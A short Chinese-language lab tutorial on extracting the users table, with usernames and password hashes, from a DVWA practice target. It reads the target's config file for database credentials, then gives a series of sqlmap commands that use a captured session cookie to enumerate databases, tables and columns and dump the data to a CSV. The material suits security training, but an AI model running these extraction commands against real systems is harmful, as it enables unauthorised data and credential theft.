本文描述使用sqlmap对DVWA靶机进行脱库
一、先登录靶机,查看目标靶机的用户名密码
1、先查询dvwa靶机的登录代码文件
进入OWASP系统的/var/www/dvwa目录,查询login.php登录文件可知,存在sql注入,如下:
2、进入/var/www/dvwa/config目录,查看config.inc.php文件得到dvwa数据库的用户名和密码:
3、连接dvwa数据库:mysql -u dvwa -p,密码为dvwa,得到dvwa库和users表,查询出表中的用户名和密码
到这里我们得到了目标靶机的用户名以及对应密码的md5值
二、使用sqlmap进行爆库
1、打开dvwa-->sql injection,把级别调到low
抓包,得到requests url和cookie(slmap扫描的时候会重定向到认证的页面,拿到cookie,才能在这个页面进行持续扫描)
2、扫描当前页面
sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#' -- cookie='security=low;PHPSESSID=9sl0enh9nkoto78fro3r8df4l7'
3、获取数据库名称
sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#' --cookie='security=low;PHPSESSID=9sl0enh9nkoto78fro3r8df4l7' --dbs -v 0
4、获取表明
sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#' --cookie='security=low;PHPSESSID=9sl0enh9nkoto78fro3r8df4l7' -D dvwa --tables
5、获取列名
sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#' --cookie='security=low;PHPSESSID=9sl0enh9nkoto78fro3r8df4l7' -D dvwa -T users --columns
6、脱库
sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#' --cookie='security=low;PHPSESSID=9sl0enh9nkoto78fro3r8df4l7' --dump -D dvwa -T users -C 'user,password'
保存在用户名密码保存在users.csv里